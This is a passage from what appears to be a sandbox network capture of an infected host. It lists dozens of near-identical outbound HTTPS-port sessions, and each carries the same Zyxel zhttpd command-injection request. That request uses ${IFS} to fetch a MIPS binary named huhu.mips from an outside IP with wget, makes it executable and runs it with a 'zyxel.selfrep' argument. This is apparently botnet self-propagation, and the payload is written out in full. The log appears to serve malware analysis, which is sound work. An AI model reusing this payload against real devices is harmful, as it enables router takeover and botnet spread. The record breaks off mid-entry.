                                                        9101192.168.2.1436688218.177.244.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318373919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9102192.168.2.1454430115.71.198.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318387985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9103192.168.2.1448716177.229.46.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318442106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9104192.168.2.1453524119.65.97.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318478107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9105192.168.2.1449908130.236.135.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318504095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9106192.168.2.1455386209.57.147.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318583965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9107192.168.2.1446350167.74.54.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318614006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9108192.168.2.1458996131.1.139.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318654060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9109192.168.2.1445264223.162.66.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318690062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9110192.168.2.1451164162.188.200.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318708897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9111192.168.2.1459322171.80.124.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318757057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9112192.168.2.1458192108.130.214.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318793058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9113192.168.2.1457562190.25.103.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318810940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9114192.168.2.1458516183.181.99.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318850040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9115192.168.2.143355269.39.126.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318895102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9116192.168.2.1449396218.26.74.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318929911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9117192.168.2.1460100201.214.184.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.318969965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9118192.168.2.144952464.183.225.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319076061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9119192.168.2.144723654.237.175.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319103956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9120192.168.2.1452134128.239.38.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319127083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9121192.168.2.144793850.32.122.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319171906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9122192.168.2.144794620.175.74.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319206953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9123192.168.2.144201442.88.91.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319232941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9124192.168.2.1438356167.30.177.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319288969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9125192.168.2.144624238.236.204.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319319963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9126192.168.2.143312027.216.144.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319358110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9127192.168.2.144143843.4.130.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319394112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9128192.168.2.143382896.2.146.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319437027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9129192.168.2.144324027.15.79.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319487095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9130192.168.2.1434246110.146.211.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319544077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9131192.168.2.145216884.9.143.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319574118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9132192.168.2.144741263.195.106.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319610119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9133192.168.2.1459184211.226.92.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319660902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9134192.168.2.144358619.121.181.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319708109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9135192.168.2.1437870109.76.177.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319741964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9136192.168.2.1454864181.7.12.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319765091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9137192.168.2.1455764218.101.190.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319817066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9138192.168.2.144725497.232.152.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319859982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9139192.168.2.144054698.195.206.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319884062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9140192.168.2.1450008212.140.19.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.319950104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9141192.168.2.143953866.148.133.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320004940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9142192.168.2.1444942146.239.81.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320039034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9143192.168.2.1454182146.175.64.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320090055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9144192.168.2.1441478209.98.89.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320135117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9145192.168.2.145135483.203.154.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320173979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9146192.168.2.145740885.87.5.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320209026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9147192.168.2.144502237.247.114.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320235968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9148192.168.2.1448758162.54.88.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320283890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9149192.168.2.1443944223.112.230.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320316076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9150192.168.2.1447322126.25.31.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320362091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9151192.168.2.14339141.137.39.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320394993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9152192.168.2.145629075.119.212.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320445061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9153192.168.2.144639444.108.16.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320468903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9154192.168.2.1439868168.149.144.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320513010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9155192.168.2.1444606195.36.47.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320569992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9156192.168.2.1443410217.240.244.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320605993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9157192.168.2.144545640.212.44.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320640087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9158192.168.2.143528258.35.7.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320686102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9159192.168.2.14402789.94.209.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320714951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9160192.168.2.1432866112.185.54.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320775986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9161192.168.2.144272052.110.42.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320775986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9162192.168.2.1445816108.67.28.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320828915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9163192.168.2.145401276.182.221.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.320885897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9164192.168.2.1444528115.51.227.242443
